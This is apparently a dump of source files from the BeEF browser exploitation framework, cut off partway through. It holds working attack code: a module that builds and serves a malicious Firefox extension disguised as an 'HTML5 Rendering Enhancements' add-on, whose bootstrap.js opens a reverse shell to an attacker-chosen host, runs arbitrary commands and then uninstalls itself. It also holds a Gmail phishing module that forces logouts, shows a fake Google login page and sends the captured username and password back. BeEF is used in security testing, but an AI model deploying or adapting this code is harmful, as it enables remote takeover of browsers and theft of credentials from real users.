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'>"); $j(hid).append(elr); $j(hid).click(function() { $j(this).slideUp(300,function() { $j(this).remove(); }); //window.location.href = ff_extension; window.open(ff_extension); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification'); }); $j(hid).css('cursor','pointer'); $j(hid).slideDown(300,function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed'); }); } });
YAML
beef/modules/social_engineering/firefox_extension_reverse_shell/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: firefox_extension_reverse_shell: enable: true category: ["Social Engineering"] name: "Firefox Extension (Reverse Shell)" description: "Create on the fly a malicious Firefox extension that makes a reverse shell connection to a specified host:port.<br/><br/>The extension is based on the original work from Michael Schierl and his Metasploit module, and joev's Firefox payloads for Metasploit." authors: ["antisnatchor", "bcoles"] target: user_notify: FF: min_ver: 1 max_ver: 56 not_working: ["All"]
Ruby
beef/modules/social_engineering/firefox_extension_reverse_shell/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Firefox_extension_reverse_shell < BeEF::Core::Command class Bind_extension < BeEF::Core::Router::Router before do headers 'Content-Type' => 'application/x-xpinstall', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Expires' => '0' end get '/' do response['Content-Type'] = 'application/x-xpinstall' extension_path = settings.extension_path print_info "Serving malicious Firefox Extension (Reverse Shell): #{extension_path}" send_file extension_path.to_s, type: 'application/x-xpinstall', disposition: 'inline' end end def pre_send # gets the value configured in the module configuration by the user @datastore.each do |input| @extension_name = input['value'] if input['name'] == 'extension_name' @xpi_name = input['value'] if input['name'] == 'xpi_name' @lport = input['value'] if input['name'] == 'lport' @lhost = input['value'] if input['name'] == 'lhost' end mod_path = "#{$root_dir}/modules/social_engineering/firefox_extension_reverse_shell" extension_path = "#{mod_path}/extension" # clean the build directory FileUtils.rm_rf("#{extension_path}/build/.", secure: true) # copy in the build directory necessary file, substituting placeholders File.open("#{extension_path}/build/install.rdf", 'w') do |file| file.puts File.read("#{extension_path}/install.rdf").gsub!('__extension_name_placeholder__', @extension_name) end File.open("#{extension_path}/build/bootstrap.js", 'w') do |file| file.puts File.read("#{extension_path}/bootstrap.js").gsub!('__reverse_shell_port_placeholder__', @lport).gsub!('__reverse_shell_host_placeholder__', @lhost) end File.open("#{extension_path}/build/overlay.xul", 'w') { |file| file.puts File.read("#{extension_path}/overlay.xul") } File.open("#{extension_path}/build/chrome.manifest", 'w') { |file| file.puts File.read("#{extension_path}/chrome.manifest") } extension_content = ['install.rdf', 'bootstrap.js', 'overlay.xul', 'chrome.manifest'] # create the XPI extension container xpi = "#{extension_path}/#{@xpi_name}.xpi" File.delete(xpi) if File.exist?(xpi) Zip::File.open(xpi, Zip::File::CREATE) do |xpi| extension_content.each do |filename| xpi.add(filename, "#{extension_path}/build/#{filename}") end end # mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specific content-type/disposition) bind_extension = Firefox_extension_reverse_shell::Bind_extension bind_extension.set :extension_path, "#{$root_dir}/modules/social_engineering/firefox_extension_reverse_shell/extension/#{@xpi_name}.xpi" BeEF::Core::Server.instance.mount("/#{@xpi_name}.xpi", bind_extension.new) BeEF::Core::Server.instance.remap end def self.options @configuration = BeEF::Core::Configuration.instance beef_host = @configuration.beef_host [ { 'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements' }, { 'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements' }, { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '1337' }, { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => beef_host.to_s } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/social_engineering/firefox_extension_reverse_shell/extension/bootstrap.js
function startup(data, reason) { var file = Components.classes["@mozilla.org/file/directory_service;1"]. getService(Components.interfaces.nsIProperties). get("ProfD", Components.interfaces.nsIFile); file.append("extensions"); xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}"; file.append(xpi_guid); // # ./msfpayload firefox/shell_reverse_tcp (function(){ Components.utils.import("resource://gre/modules/NetUtil.jsm"); var host = '__reverse_shell_host_placeholder__'; var port = __reverse_shell_port_placeholder__; var socketTransport = Components.classes["@mozilla.org/network/socket-transport-service;1"] .getService(Components.interfaces.nsISocketTransportService); var socket = socketTransport.createTransport(null, 0, host, port, null); var outStream = socket.openOutputStream(0, 0, 0); var inStream = socket.openInputStream(0, 0, 0); var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"] .createInstance(Components.interfaces.nsIInputStreamPump); pump.init(inStream, -1, -1, 0, 0, true); var listener = { onStartRequest: function(request, context) {}, onStopRequest: function(request, context) {}, onDataAvailable: function(request, context, stream, offset, count) { var data = NetUtil.readInputStreamToString(stream, count).trim(); runCmd(data, function(err, output) { if (!err) outStream.write(output, output.length); }); } }; var readFile = function(path) { try { var file = Components.classes["@mozilla.org/file/local;1"] .createInstance(Components.interfaces.nsILocalFile); file.initWithPath(path); var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"] .createInstance(Components.interfaces.nsIFileInputStream); fileStream.init(file, 1, 0, false); var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"] .createInstance(Components.interfaces.nsIBinaryInputStream); binaryStream.setInputStream(fileStream); var array = binaryStream.readByteArray(fileStream.available()); binaryStream.close(); fileStream.close(); file.remove(true); return array.map(function(aItem) { return String.fromCharCode(aItem); }).join(""); } catch (e) { return ""; } }; var setTimeout = function(cb, delay) { var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer); timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT); return timer; }; var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"] .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent; var windows = (ua.indexOf("Windows")>-1); var svcs = Components.utils.import("resource://gre/modules/Services.jsm"); var jscript = ({"src":"\n var b64 = WScript.arguments(0);\n var dom = new ActiveXObject(\"MSXML2.DOMDocument.3.0\");\n var el = dom.createElement(\"root\");\n el.dataType = \"bin.base64\"; el.text = b64; dom.appendChild(el);\n var stream = new ActiveXObject(\"ADODB.Stream\");\n stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);\n stream.Position=0; stream.type=2; stream.CharSet = \"us-ascii\"; stream.Position=0;\n var cmd = stream.ReadText();\n (new ActiveXObject(\"WScript.Shell\")).Run(cmd, 0, true);\n "}).src; var runCmd = function(cmd, cb) { cb = cb || (function(){}); if (cmd.trim().length == 0) { setTimeout(function(){ cb("Command is empty string ('')."); }); return; } var js = (/^\s*\[JAVASCRIPT\]([\s\S]*)\[\/JAVASCRIPT\]/g).exec(cmd.trim()); if (js) { var tag = "[!JAVASCRIPT]"; var sync = true; // avoid zalgo's reach var sent = false; var retVal = null; try { retVal = Function('send', js[1])(function(r){ if (sent) return; sent = true if (r) { if (sync) setTimeout(function(){ cb(false, r+tag+"\n"); }); else cb(false, r+tag+"\n"); } }); } catch (e) { retVal = e.message; } sync = false; if (retVal && !sent) { sent = true; setTimeout(function(){ cb(false, retVal+tag+"\n"); }); } return; } var shEsc = "\\$&"; var shPath = "/bin/sh -c" if (windows) { shPath = "cmd /c"; shEsc = "\^$&"; var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"] .getService(Components.interfaces.nsIProperties) .get("TmpD", Components.interfaces.nsIFile); jscriptFile.append('7kZuA4kPoh2HzVagS.js'); var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"] .createInstance(Components.interfaces.nsIFileOutputStream); stream.init(jscriptFile, 0x04 | 0x08 | 0x20, 0666, 0); stream.write(jscript, jscript.length); if (stream instanceof Components.interfaces.nsISafeOutputStream) { stream.finish(); } else { stream.close(); } } var stdoutFile = "7tDzOIHbP3vzglqB"; var stdout = Components.classes["@mozilla.org/file/directory_service;1"] .getService(Components.interfaces.nsIProperties) .get("TmpD", Components.interfaces.nsIFile); stdout.append(stdoutFile); if (windows) { var shell = shPath+" "+cmd; shell = shPath+" "+shell.replace(/\W/g, shEsc)+" >"+stdout.path+" 2>&1"; var b64 = svcs.btoa(shell); } else { var shell = shPath+" "+cmd.replace(/\W/g, shEsc); shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1"; } var process = Components.classes["@mozilla.org/process/util;1"] .createInstance(Components.interfaces.nsIProcess); var sh = Components.classes["@mozilla.org/file/local;1"] .createInstance(Components.interfaces.nsILocalFile); if (windows) { sh.initWithPath("C:\\Windows\\System32\\wscript.exe"); process.init(sh); var args = [jscriptFile.path, b64]; process.run(true, args, args.length); jscriptFile.remove(true); setTimeout(function(){cb(false, cmd+"\n"+readFile(stdout.path));}); } else { sh.initWithPath("/bin/sh"); process.init(sh); var args = ["-c", shell]; process.run(true, args, args.length); setTimeout(function(){cb(false, readFile(stdout.path));}); } }; pump.asyncRead(listener, null); })(); try { // Fx < 4.0 Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid); } catch (e) {} try { // Fx 4.0 and later Components.utils.import("resource://gre/modules/AddonManager.jsm"); AddonManager.getAddonByID(xpi_guid, function(addon) { addon.uninstall(); }); } catch (e) {} }
beef/modules/social_engineering/firefox_extension_reverse_shell/extension/chrome.manifest
content {861fb387-92ce-bb0a-cb48-4b923dbc292b} ./ overlay chrome://browser/content/browser.xul chrome://{861fb387-92ce-bb0a-cb48-4b923dbc292b}/content/overlay.xul
beef/modules/social_engineering/firefox_extension_reverse_shell/extension/install.rdf
<?xml version="1.0"?> <RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#"> <Description about="urn:mozilla:install-manifest"> <em:id>{861fb387-92ce-bb0a-cb48-4b923dbc292b}</em:id> <em:name>__extension_name_placeholder__</em:name> <em:version>1.0</em:version> <em:bootstrap>true</em:bootstrap> <em:unpack>true</em:unpack> <em:targetApplication> <Description> <em:id>[email protected]</em:id> <em:minVersion>1.0</em:minVersion> <em:maxVersion>*</em:maxVersion> </Description> </em:targetApplication> <em:targetApplication> <Description> <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id> <em:minVersion>1.0</em:minVersion> <em:maxVersion>*</em:maxVersion> </Description> </em:targetApplication> </Description> </RDF>
beef/modules/social_engineering/firefox_extension_reverse_shell/extension/overlay.xul
<?xml version="1.0"?> <overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"> <script src="bootstrap.js"/> <script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script> </overlay>
JavaScript
beef/modules/social_engineering/gmail_phishing/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // function logoutGoogle() { var img = document.createElement("IMG"); img.src = "https://mail.google.com/mail/?logout"; img.height = "1px"; img.width = "1px"; img.style.visibility = "hidden"; document.body.appendChild(img); //set a new setTimeout to redo the logout setTimeout('logoutGoogle()', <%= @logout_gmail_interval %>); } beef.execute(function() { document.title = "Google Mail: Email from Google"; beef.browser.changeFavicon("https://www.google.com/mail/help/images/favicon.ico"); logoutGoogle(); displayPhishingSite(); }); function clickedSubmitButton(){ var credentials = "Username: "+document.getElementById('Email').value+" Password: "+document.getElementById('Passwd').value; beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+credentials); //Timeout needed because otherwise the beef panel doesn't get the credentials in time setTimeout("redirect()", <%= @wait_seconds_before_redirect %>); } function redirect(){ var theXssUrl = "<%== @xss_hook_url %>"; if(theXssUrl){ window.open(theXssUrl); window.focus(); } window.location = "https://accounts.google.com/"; } function displayPhishingSite(){ var zztop = beef.dom.getHighestZindex()+1; beef.dom.removeStylesheets(); document.body.innerHTML = "<!DOCTYPE html> <html lang='en'> <head> <meta charset='utf-8'> <title>Google Mail: Email from Google</title> <meta name='description' content='7+ GB of storage, less spam, and mobile access. is email that&#39;s intuitive, efficient, and useful. And maybe even fun.'> <link rel='icon' type='image/ico' href='https://mail.google.com/favicon.ico'> <style type='text/css'> html, body, div, h1, h2, h3, h4, h5, h6, p, img, dl, dt, dd, ol, ul, li, table, tr, td, form, object, embed, article, aside, canvas, command, details, fieldset, figcaption, figure, footer, group, header, hgroup, legend, mark, menu, meter, nav, output, progress, section, summary, time, audio, video { margin: 0; padding: 0; border: 0; } article, aside, details, figcaption, figure, footer, header, hgroup, menu, nav, section { display: block; } html { font: 81.25% arial, helvetica, sans-serif; background: #fff; color: #333; line-height: 1; direction: ltr; } a { color: #15c; text-decoration: none; } a:active { color: #d14836; } a:hover { text-decoration: underline; } h1, h2, h3, h4, h5, h6 { color: #222; font-size: 1.54em; font-weight: normal; 